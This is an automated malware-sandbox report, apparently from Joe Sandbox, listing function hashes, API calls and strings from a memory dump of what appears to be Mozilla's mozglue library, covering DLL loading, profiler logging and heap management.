Opcode ID: 4c9598bda6d2e90a084a4de389eb9d0ca17d6f97fe1f1d20a2e0b83aeeb7daae
Instruction ID: c3d4378455803f95b78f1705808f51f36872603c8c697ba22f0fcb4c9f401e01
Opcode Fuzzy Hash: 4c9598bda6d2e90a084a4de389eb9d0ca17d6f97fe1f1d20a2e0b83aeeb7daae
Instruction Fuzzy Hash: 6D11B6B1905225ABD710AF76DC44BAB7EF8EF85354F044529F88897300E77498408BE6

Function 6C5D0EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5FAB89: EnterCriticalSection.KERNEL32(6C64E370,?,?,?,6C5C34DE,6C64F6CC,?,?,?,?,?,?,?,6C5C3284), ref: 6C5FAB94
Part of subcall function 6C5FAB89: LeaveCriticalSection.KERNEL32(6C64E370,?,6C5C34DE,6C64F6CC,?,?,?,?,?,?,?,6C5C3284,?,?,6C5E56F6), ref: 6C5FABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C5FD9F0,00000000), ref: 6C5D0F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C5D0F3C
__Init_thread_footer.LIBCMT ref: 6C5D0F50
FreeLibrary.KERNEL32(?,6C5FD9F0,00000000), ref: 6C5D0F86

Strings

CoInitializeEx, xrefs: 6C5D0F36
combase.dll, xrefs: 6C5D0F18

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: b08ba57f2096b3538400d8a4aa41b0ff22a02031b0fd70db0a7ab4feb17b6512
Instruction ID: 8f071aa9ad6c78448b1dd1fd6f9e96fb96bad741c7f267a215224122894ab938
Opcode Fuzzy Hash: b08ba57f2096b3538400d8a4aa41b0ff22a02031b0fd70db0a7ab4feb17b6512
Instruction Fuzzy Hash: 3011A374305341DBDF08EF5ACD88E9A3774EBDA32AF12C61AE90582640D732A402CE5F

Function 6C60F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C609420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C5D4A68), ref: 6C60945E
Part of subcall function 6C609420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C609470
Part of subcall function 6C609420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C609482
Part of subcall function 6C609420: __Init_thread_footer.LIBCMT ref: 6C60949F

GetCurrentThreadId.KERNEL32 ref: 6C60F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C60F561

Part of subcall function 6C6094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6094EE
Part of subcall function 6C6094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C609508

GetCurrentThreadId.KERNEL32 ref: 6C60F577
AcquireSRWLockExclusive.KERNEL32(6C64F4B8), ref: 6C60F585
ReleaseSRWLockExclusive.KERNEL32(6C64F4B8), ref: 6C60F5A3

Strings

[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C60F56A
[I %d/%d] profiler_resume_sampling, xrefs: 6C60F499
[I %d/%d] profiler_resume, xrefs: 6C60F239
[I %d/%d] profiler_pause_sampling, xrefs: 6C60F3A8

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: e407e1350ac451a5fc7379847cedbeecbaff4c3046b82c18f9a7f2c6ed72cf4e
Instruction ID: 25a4f2503e7b2589e15691826098b65cda557280f792d49c8a3742f0f93caff6
Opcode Fuzzy Hash: e407e1350ac451a5fc7379847cedbeecbaff4c3046b82c18f9a7f2c6ed72cf4e
Instruction Fuzzy Hash: 2BF054757006049BDB007F66D888E5E77BDEFC62ADF00C425EA0593702DF754805876E

Function 6C5D0E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,6C5D0DF8), ref: 6C5D0E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C5D0EA1
__Init_thread_footer.LIBCMT ref: 6C5D0EB5
FreeLibrary.KERNEL32 ref: 6C5D0EC5

Strings

GetProcessMitigationPolicy, xrefs: 6C5D0E9B
kernel32.dll, xrefs: 6C5D0E7D

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: 45f8af100d11d7bb55ef71b0fb3e360fb3c39d1991526dd66b0e86f78fe5c089
Instruction ID: f59b3caed3f4828c66e936044b7d4f7b924166f00c8a3391698a845505d7d67e
Opcode Fuzzy Hash: 45f8af100d11d7bb55ef71b0fb3e360fb3c39d1991526dd66b0e86f78fe5c089
Instruction Fuzzy Hash: 19012874700382CBDB00AFAAE894A4A73B5E78631EF11E926991182F40D778B4098A1F

Function 6C60F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C609420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C5D4A68), ref: 6C60945E
Part of subcall function 6C609420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C609470
Part of subcall function 6C609420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C609482
Part of subcall function 6C609420: __Init_thread_footer.LIBCMT ref: 6C60949F

GetCurrentThreadId.KERNEL32 ref: 6C60F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C60F598), ref: 6C60F621

Part of subcall function 6C6094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6094EE
Part of subcall function 6C6094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C609508

GetCurrentThreadId.KERNEL32 ref: 6C60F637
AcquireSRWLockExclusive.KERNEL32(6C64F4B8,?,?,00000000,?,6C60F598), ref: 6C60F645
ReleaseSRWLockExclusive.KERNEL32(6C64F4B8,?,?,00000000,?,6C60F598), ref: 6C60F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C60F62A

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 2848912005-753366533
Opcode ID: cc6d68ad72fc5b166cb82083215bd2c28ea39f7f7339ea20b0828db9f2788256
Instruction ID: ba862d501ad535c864b57e78dc334620c66ebf1d02d3942686957ddec044b417
Opcode Fuzzy Hash: cc6d68ad72fc5b166cb82083215bd2c28ea39f7f7339ea20b0828db9f2788256
Instruction Fuzzy Hash: ADF05EB5300604ABDB007F66D888E5E7BBDEFC62ADF00C425EA0593742DB754C068B6E

Function 6C6005F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C5FCFAE,?,?,?,6C5C31A7), ref: 6C6005FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C5FCFAE,?,?,?,6C5C31A7), ref: 6C600616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C5C31A7), ref: 6C60061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C5C31A7), ref: 6C600627

Strings

<jemalloc>, xrefs: 6C6005FA, 6C60060F
: (malloc) Error in VirtualFree(), xrefs: 6C60061B, 6C600625

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 3c028313160149d0e479200739425540fcfb25030bae9470754f9279b4a9ce95
Instruction ID: 11a61e6009b6077c91222afa0d54f75a81918fc4ef17807b646ddc6fcfd07655
Opcode Fuzzy Hash: 3c028313160149d0e479200739425540fcfb25030bae9470754f9279b4a9ce95
Instruction Fuzzy Hash: 0BE08CE2A0202037F6142256AC86DBB761CDBC6138F080139FE0E87301E94AAD1A51FA

Function 6C5D05F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5658be6edb08feacf7e4e0eab0c08d05c4b3bc33eaa7164ab3e6824e059d344d
Instruction ID: c0a63c71a7f793b22fa5b91e5e5bd8e2af0281a6ce04312145e950b670540c22
Opcode Fuzzy Hash: 5658be6edb08feacf7e4e0eab0c08d05c4b3bc33eaa7164ab3e6824e059d344d
Instruction Fuzzy Hash: 06A12770A01745CFDB14CF29C994A9AFBF1BB89304F45866AD44A9BB00E731B985CF94

Function 6C6214A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6214C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6214E2
GetCurrentThreadId.KERNEL32 ref: 6C621546
InitializeConditionVariable.KERNEL32(?), ref: 6C6215BA
free.MOZGLUE(?), ref: 6C6216B4

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: 76973b4e4d4aad6d9b7d5f44913697e364456f406d7be569bc57b9393696d146
Instruction ID: 7bbc4385bf2c19e2037474ad6467070cdb38aca36303bbae4f7073e781e2db62
Opcode Fuzzy Hash: 76973b4e4d4aad6d9b7d5f44913697e364456f406d7be569bc57b9393696d146
Instruction Fuzzy Hash: CB61F271A047009BDB21DF25C880BDEB7B0BF8A308F44851CED8A67701DB35E959CB99

Function 6C61DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C61DC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C61D38A,?), ref: 6C61DC6F
free.MOZGLUE(?,?,?,?,?,6C61D38A,?), ref: 6C61DCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C61D38A,?), ref: 6C61DCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C61D38A,?), ref: 6C61DD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C61D38A,?), ref: 6C61DD4A

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: 7402dce0d87de27d4fedff7d5423565f1016a2338701dee2745b4847fe78b0ef
Instruction ID: dee93f484dbf10babaae7559b463710b9726233886895710366c1c9aec2fd4bc
Opcode Fuzzy Hash: 7402dce0d87de27d4fedff7d5423565f1016a2338701dee2745b4847fe78b0ef
Instruction Fuzzy Hash: 15415AB5A00605DFCB00CFA9C88099AB7F6FF89318B554569DA45ABB10D771FC00CB94

Function 6C5FF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C5FF480

Part of subcall function 6C5CF100: LoadLibraryW.KERNEL32(shell32,?,6C63D020), ref: 6C5CF122
Part of subcall function 6C5CF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C5CF132

CloseHandle.KERNEL32(00000000), ref: 6C5FF555

Part of subcall function 6C5D14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C5D1248,6C5D1248,?), ref: 6C5D14C9
Part of subcall function 6C5D14B0: memcpy.VCRUNTIME140(?,6C5D1248,00000000,?,6C5D1248,?), ref: 6C5D14EF

Part of subcall function 6C5CEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C5CEEE3

CreateFileW.KERNEL32 ref: 6C5FF4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C5FF523

Strings

\oleacc.dll, xrefs: 6C5FF4CB

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: c030b216e3c2ecd2817699f63ed0f3f6adab752d43c8d9e582688aa35d3d731a
Instruction ID: 3b33cb4800f84965448955d47e7e9c572bcaf1c2a2058b4a4163e88889fef48c
Opcode Fuzzy Hash: c030b216e3c2ecd2817699f63ed0f3f6adab752d43c8d9e582688aa35d3d731a
Instruction Fuzzy Hash: 5941BC306087109FE725DF69CC84A9BB7F4AF85318F104B1CE5A083A51EB70E94ACF92

Function 6C6274A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C627526
__Init_thread_footer.LIBCMT ref: 6C627566
__Init_thread_footer.LIBCMT ref: 6C627597

Strings

kernel32.dll, xrefs: 6C627557
UnmapViewOfFile2, xrefs: 6C627552

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 8ad65f9df3f87014ba9b51f716028e304e07cfd38e280783fbb20b9634e57da2
Instruction ID: f836c2573638acb4679bf3ac4df52c18e56fd6ebf02ef9867ef86fccfc8e85f3
Opcode Fuzzy Hash: 8ad65f9df3f87014ba9b51f716028e304e07cfd38e280783fbb20b9634e57da2
Instruction Fuzzy Hash: 3D21D331700501A7DB18DFEAD894E9A7376EB8632DF15C528D80557F80DB2DA8028E9F

Function 6C62C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C62C0E9), ref: 6C62C418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C62C437
FreeLibrary.KERNEL32(?,6C62C0E9), ref: 6C62C44C

Strings

ntdll.dll, xrefs: 6C62C413
NtQueryVirtualMemory, xrefs: 6C62C431

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: 85d762d0bd75512e751db3025ae304935c40ec91e39cdca2b0fdbe2335388998
Instruction ID: 44ca26d44f00dcbc182d4a83ddd1486ba018090b1929048988630f2cf9a13dff
Opcode Fuzzy Hash: 85d762d0bd75512e751db3025ae304935c40ec91e39cdca2b0fdbe2335388998
Instruction Fuzzy Hash: A9E09270705701AFEB007FB7CD88B167AF8AB8638CF00E116AA0599651EBB4C0028A5E

Function 6C6275B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C62748B,?), ref: 6C6275B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C6275D7
FreeLibrary.KERNEL32(?,6C62748B,?), ref: 6C6275EC

Strings

ntdll.dll, xrefs: 6C6275B3
RtlNtStatusToDosError, xrefs: 6C6275D1

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: 30d8b49e1e64e496d4e4562417ebb147a30739dcc9126ee2b654caf5f4c0ef3a
Instruction ID: 917de9a7a295d63a8a1a184b550319a10f23a863452cabc603b53c1c965a221a
Opcode Fuzzy Hash: 30d8b49e1e64e496d4e4562417ebb147a30739dcc9126ee2b654caf5f4c0ef3a
Instruction Fuzzy Hash: 0FE07571605701ABDB007BA7D8C8B057AF8E78625CF10D025AA0591A11DAB88052CF1E

Function 6C627600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C627592), ref: 6C627608
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C627627
FreeLibrary.KERNEL32(?,6C627592), ref: 6C62763C

Strings

NtUnmapViewOfSection, xrefs: 6C627621
ntdll.dll, xrefs: 6C627603

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 145871493-1050664331
Opcode ID: 49cd289dc3fbd1d0b9910f51bb559a60ee015c177d7702e3a23357158805ba77
Instruction ID: c3e3ae5926acd739f127697a6a4915de4cb8f307b8072c974ab6a4569f5e7a5f
Opcode Fuzzy Hash: 49cd289dc3fbd1d0b9910f51bb559a60ee015c177d7702e3a23357158805ba77
Instruction Fuzzy Hash: 27E092B4605701ABDF007FA7E898F457EB9E79A39DF01D115EA05D1A11EBB980018F1E

Function 6C62BE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6C62BE49), ref: 6C62BEC4
RtlCaptureStackBackTrace.NTDLL ref: 6C62BEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C62BE49), ref: 6C62BF38
RtlReAllocateHeap.NTDLL ref: 6C62BF83
RtlFreeHeap.NTDLL ref: 6C62BFA6

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: f1f3b3601924456a86a7552d08daee096d77e54a34359b6658c92c82b3ee2380
Instruction ID: 5e882d05222dcc063640c8223fab147d1a754bcbd095adbf9eb79b2abf60190a
Opcode Fuzzy Hash: f1f3b3601924456a86a7552d08daee096d77e54a34359b6658c92c82b3ee2380
Instruction Fuzzy Hash: F4518071A002158FE720CF69C980B9AB7A2FFC9314F298629D556A7B94D734F9068F84

Function 6C618E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C60B58D,?,?,?,?,?,?,?,6C63D734,?,?,?,6C63D734), ref: 6C618E6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C60B58D,?,?,?,?,?,?,?,6C63D734,?,?,?,6C63D734), ref: 6C618EBF
free.MOZGLUE(?,?,?,?,6C60B58D,?,?,?,?,?,?,?,6C63D734,?,?,?), ref: 6C618F24
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C60B58D,?,?,?,?,?,?,?,6C63D734,?,?,?,6C63D734), ref: 6C618F46
free.MOZGLUE(?,?,?,?,6C60B58D,?,?,?,?,?,?,?,6C63D734,?,?,?), ref: 6C618F7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C60B58D,?,?,?,?,?,?,?,6C63D734,?,?,?), ref: 6C618F8F

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 782cba98f1fd2cf4816a2a7b47ff04d608eeb7286a6469011224e0f6e55a37a7
Instruction ID: 3e05e840ec3574453e91c3bf80e125e32c5adc089fa020850a516d7b6f3b27c3
